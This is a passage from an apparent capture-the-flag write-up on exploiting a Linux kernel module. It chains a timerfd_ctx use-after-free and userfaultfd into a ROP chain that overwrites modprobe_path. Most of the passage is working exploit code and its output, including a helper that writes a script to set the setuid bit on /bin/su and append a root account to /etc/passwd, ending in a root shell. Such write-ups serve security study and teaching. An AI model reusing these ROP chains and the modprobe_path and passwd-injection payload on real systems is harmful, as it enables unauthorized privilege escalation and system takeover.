*rop ++= kernel_base + 0xffffffff810537d0UL; // cc
*rop ++= kernel_base + 0xffffffff8118a8d3UL; // pop rcx; ret;
*rop ++= (unsigned long)(read_flag);
*rop ++= kernel_base + 0xffffffff81008b7dUL; // pop r11; pop r12; pop rbp; ret;
*rop ++= usr_rflags;
*rop ++= 0; // r12
*rop ++= 0; // rbp
*rop ++= kernel_base + 0xffffffff81200106UL; // kpti_trampoline (sysret)
*rop ++= 0; // rax
*rop ++= 0; // rdi
*rop ++= (unsigned long)(fake_stack + 0x1000); // rsp

Let’s test the modified exploit:

    / $ /home/user/poc3
    [*] Allocating/Freeing timerfd_ctx structure...
    [*] Leaking timerfd_tmrproc address...
    [+] Object dump:
        0000  0xffff88800029b800    0x0000000000000000      
        0010  0x0000000000000000    0x00000002de088cb1      
        0020  0x00000002de088cb1    0xffffffff81102a00      
        0030  0xffffffff8183e080    0x0000000000000000      
        0040  0x0000000000000000    0x0000000000000000      
        0050  0x0000000000000000    0x0000000000000000      
        0060  0x0000000000000000    0x0000000000000000      
        0070  0x0000000000000000    0x0000000000000000      
        0080  0xbd7ad3bf6c2aae81    0xffff88800029b888      
        0090  0xffff88800029b888    0x0000000000000000      
        00a0  0x0000000000000000    0xffff888000157600      
        00b0  0x00000000000000a8    0x0000000000000000      
        00c0  0x0000000000000000    0x0000000000000000      
        00d0  0x0000000000000000    0x0000000000000000      
        00e0  0x0000000000000000    0x0000000000000000    
    [+] Leaked timerfd_ctx structure address: 0xffff88800029b800            
    [+] Leaked timerfd_tmrproc address: 0xffffffff81102a00
    [+] Kernel base address: 0xffffffff00000000
    [*] Mmapping page...
    [*] Start monitoring range: 0xdead000 - 0xdeae000
    [*] Triggering page fault...
    [+] Page fault at address 0xdead000!
    [*] Freeing...
    [*] Creating second timer...
    [*] Structure will be overwritten with:
        0000  0x000000000cafe800    0x0000000000000000      
        0010  0x0000000000000000    0x000000000eae0e65      
        0020  0x000000000eae0e65    0xffffffff81027b86      
        0030  0xffffffff8183e080    0x0000000000000000      
        0040  0x0000000000000000    0x0000000000000000      
        0050  0x0000000000000000    0x0000000000000000      
        0060  0x0000000000000000    0x0000000000000000      
        0070  0x0000000000000000    0x0000000000000000      
        0080  0xbd7ad3bf6c2aae81    0xffff88800029b888      
        0090  0xffff88800029b888    0x0000000000000000      
        00a0  0x0000000000000000    0xffff888000157600      
        00b0  0x00000000000000a8    0x0000000000000000      
        00c0  0x0000000000000000    0x0000000000000000      
        00d0  0x0000000000000000    0x0000000000000000      
        00e0  0x0000000000000000    0x0000000000000000    
    CUCTF{TEST} // [1]

    BUG: unable to handle page fault for address: 00000001034cc473
    #PF: supervisor instruction fetch in kernel mode
    [...]

The kernel crashed, but we successfully read the flag [1]. Cool, but it’s not enough. We want a shell!

Initially I tried to replace the read_flag() function with:

static void execve_shell(void)
{
    if (getuid() != 0)
    {
        puts("[ERROR] We are not root!");
        exit(1);
    }

    puts("[+] We are root!");
    execve("/bin/sh", 0, 0);
}

Unfortunately, I could not get it to work, but after spending some time experimenting, I found and alternative approach to get a shell.

First, we need to fix the timerfd_ctx structure we corrupted in the previous steps. I replaced the first address with the original timerfd_ctx address and the sixth address, (now overwritten by the stack pivot gadget) with:

0xffffffff810001dc: ret;

So when the function pointer will be called again, the call will simply return.

// Fix idx 0x0
*rop ++= kernel_base + 0xffffffff81027b8eUL; // mov rax, rdi; ret;
*rop ++= kernel_base + 0xffffffff8106e24aUL; // mov rsi, rax; sub rsi, rcx; cmp rdx, rax; cmovs r8, rsi; mov rax, r8; ret;
*rop ++= kernel_base + 0xffffffff81027b8eUL; // mov rax, rdi; ret;
*rop ++= kernel_base + 0xffffffff810f6180UL; // mov qword ptr [rax], rsi; ret;

// Fix idx 0x5
*rop ++= kernel_base + 0xffffffff8113f9b6UL; // pop rdx; ret;
*rop ++= 0x28;
*rop ++= kernel_base + 0xffffffff81012183UL; // add rax, rdx; ret;
*rop ++= kernel_base + 0xffffffff81005b00UL; // pop rsi; ret;
*rop ++= kernel_base + 0xffffffff810001dcUL; // ret;
*rop ++= kernel_base + 0xffffffff810f6180UL; // mov qword ptr [rax], rsi; ret;

Even after these changes, I could not use execve/execveat etc so I opted for a different strategy.

In Linux, when a user executes a program with an unknown program header, the system calls __request_module that in turn calls call_modprobe. call_modprobe() utilizes call_usermodehelper_exec to execute the program specified by modprobe_path. modprobe_path, set by default to /sbin/morprobe.

If we overwrite modprobe_path with the location of a malicious program, for example /home/user/x, every time a file with an unknown program header is executed, the system will run our script with root privileges.

We can use the following function to automatically create a file with an unknown program header, /home/user/asd, and a script that will add a new user /home/user/x.

void prepare_exploit()
{
    system("echo -e '\xdd\xdd\xdd\xdd\xdd\xdd' > /home/user/asd");
    system("chmod +x /home/user/asd");
    system("echo '#!/bin/sh' > /home/user/x");
    system("echo 'chmod +s /bin/su' >> /home/user/x");
    system("echo 'echo \"asd:12prjwbMKCxIE:0:0:asd:/root:/bin/sh\" >> /etc/passwd' >> /home/user/x");
    system("chmod +x /home/user/x");
}

Now we can modify the ROP chain to overwrite modprobe_path using a write-what-where gadget:

// Hijack modprobe_path
*rop ++= kernel_base + 0xffffffff810b689dUL; // pop rdi; ret;
*rop ++= 0x73752f656d6f682f; // su/emoh/
*rop ++= kernel_base + 0xffffffff81005b00UL; // pop rsi; ret;
*rop ++= kernel_base + 0xffffffff81837c20UL; // modprobe_path
*rop ++= kernel_base + 0xffffffff810a5417UL; // mov qword ptr [rsi], rdi; ret;

*rop ++= kernel_base + 0xffffffff810b689dUL; // pop rdi; ret;
*rop ++= 0x782f7265; // x/re
*rop ++= kernel_base + 0xffffffff81005b00UL; // pop rsi; ret;
*rop ++= kernel_base + 0xffffffff81837c20UL + 8UL; // modprobe_path
*rop ++= kernel_base + 0xffffffff810a5417UL; // mov qword ptr [rsi], rdi; ret;

Now we only need to find a way to prevent the kernel from crashing after returning to user space. Surprisingly I was able to restore execution with this function:

static void do_nothing(void) { return; }

This way, after hijacking modprobe_path, our exploit will successfully exit and we will be able to execute /home/user/asd to force the kernel executing our malicious script:

I also tried to trap the thread with int3 and it worked too.

// pkc -> cc -> kpti trampoline -> user space -> ret
*rop ++= kernel_base + 0xffffffff810b689dUL; // pop rdi; ret;
*rop ++= 0;
*rop ++= kernel_base + 0xffffffff81053680UL; // pkc
*rop ++= kernel_base + 0xffffffff8108bacaUL; // mov rdi, rax; call 0x2d1350; mov rax, -9; pop rbp; ret;
*rop ++= 0;
*rop ++= kernel_base + 0xffffffff810537d0UL; // cc
*rop ++= kernel_base + 0xffffffff8118a8d3UL; // pop rcx; ret;
*rop ++= (unsigned long)(do_nothing); // return
*rop ++= kernel_base + 0xffffffff81008b7dUL; // pop r11; pop r12; pop rbp; ret;
*rop ++= usr_rflags;
*rop ++= 0; // r12
*rop ++= 0; // rbp
*rop ++= kernel_base + 0xffffffff81200106UL; // kpti_trampoline (sysret)
*rop ++= 0; // rax
*rop ++= 0; // rdi
*rop ++= (unsigned long)(fake_stack + 0x1000); // rsp

It is worth noting that to maximize the exploit success rate, we need perfect timing. I found the right compromise using sleep(1) before ioctl_userfaultfd(). Why is it needed? Well, no clue, I still have to dig deeply.

This will be our final exploit: exploit.c, utils.h

    / $ /home/user/exploit
    [*] Allocating/Freeing timerfd_ctx structure...
    [*] Leaking timerfd_tmrproc address...
    [+] Object dump:
        0000  0xffff88800029b600    0x0000000000000000      
        0010  0x0000000000000000    0x00000002dc1b84cb      
        0020  0x00000002dc1b84cb    0xffffffff81102a00      
        0030  0xffffffff8183e080    0x0000000000000000      
        0040  0x0000000000000000    0x0000000000000000      
        0050  0x0000000000000000    0x0000000000000000      
        0060  0x0000000000000000    0x0000000000000000      
        0070  0x0000000000000000    0x0000000000000000      
        0080  0xbd74d3bf6c2aaa81    0xffff88800029b688      
        0090  0xffff88800029b688    0x0000000000000000      
        00a0  0x0000000000000000    0xffff888000157f00      
        00b0  0x00000000000000a8    0x0000000000000000      
        00c0  0x0000000000000000    0x0000000000000000      
        00d0  0x0000000000000000    0x0000000000000000      
        00e0  0x0000000000000000    0x0000000000000000    
    [+] Leaked timerfd_ctx structure address: 0xffff88800029b600            
    [+] Leaked timerfd_tmrproc address: 0xffffffff81102a00
    [+] Kernel base address: 0xffffffff00000000
    [+] Modprobe path address: 0xffffffff81837c20
    [*] Mmapping page...
    [*] Start monitoring range: 0xdead000 - 0xdeae000
    [*] Triggering page fault...
    [+] Page fault at address 0xdead000!
    [*] Freeing...
    [*] Creating second timer...
    [*] Structure will be overwritten with:
        0000  0x000000000cafe800    0x0000000000000000      
        0010  0x0000000000000000    0x000000000eae0e65      
        0020  0x000000000eae0e65    0xffffffff81027b86      
        0030  0xffffffff8183e080    0x0000000000000000      
        0040  0x0000000000000000    0x0000000000000000      
        0050  0x0000000000000000    0x0000000000000000      
        0060  0x0000000000000000    0x0000000000000000      
        0070  0x0000000000000000    0x0000000000000000      
        0080  0xbd74d3bf6c2aaa81    0xffff88800029b688      
        0090  0xffff88800029b688    0x0000000000000000      
        00a0  0x0000000000000000    0xffff888000157f00      
        00b0  0x00000000000000a8    0x0000000000000000      
        00c0  0x0000000000000000    0x0000000000000000      
        00d0  0x0000000000000000    0x0000000000000000      
        00e0  0x0000000000000000    0x0000000000000000    
    [*] Fake stack at: 0xcafe000
    [+] Execute: "/home/user/asd" to add a new user: asd / asdasdasd
    / $ cat /etc/passwd
    root:x:0:0:root:/root:/bin/sh
    user:x:1000:1000:Linux User,,,:/home/user:/bin/sh
    / $ /home/user/asd
    /home/user/asd: line 1: ������: not found
    / $ cat /etc/passwd
    root:x:0:0:root:/root:/bin/sh
    user:x:1000:1000:Linux User,,,:/home/user:/bin/sh
    asd:12prjwbMKCxIE:0:0:asd:/root:/bin/sh
    / $ su asd
    Password:
    / # id
    uid=0(root) gid=0(root) groups=0(root)
    / #

Finally, we can enjoy our root shell!

The challenge can be found here: here.

References

SMEP

https://software.intel.com/content/www/us/en/develop/download/intel-64-and-ia-32-architectures-sdm-combined-volumes-1-2a-2b-2c-2d-3a-3b-3c-3d-and-4.html (p. 2880)

KPTI

Misc devices

Slab allocator

timerfd_ctx

Userfaultfd

Exploit diagram

http://asciiflow.com/

modprobe_path

https://www.jianshu.com/p/a2259cd3e79e